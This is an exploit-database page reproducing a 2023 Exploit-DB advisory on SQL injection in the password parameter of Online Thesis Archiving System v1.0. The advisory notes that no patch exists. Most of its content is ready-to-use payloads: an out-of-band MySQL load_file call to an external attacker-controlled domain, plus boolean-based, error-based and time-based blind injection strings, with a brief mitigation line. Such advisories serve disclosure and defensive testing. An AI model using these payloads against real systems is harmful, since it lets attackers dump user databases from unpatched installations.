header-logo
Suggest Exploit
vendor:
Online Thesis Archiving System
by:
nu11secur1ty
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Online Thesis Archiving System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2023

Online Thesis Archiving System v1.0 – Multiple-SQLi

The password parameter in the Online Thesis Archiving System v1.0 is vulnerable to SQL injection attacks. An attacker can inject a payload that executes a SQL sub-query, allowing them to dump all information from the database.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized and not executed as part of a SQL query.
Source

Exploit-DB raw data:

## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain. The application interacted with that domain, indicating that
the injected SQL query was executed. The attacker can dump all
information from the
database of this system, and then he can use it for dangerous and
malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
OR NOT 1404=1404-- Eotr

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spend:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR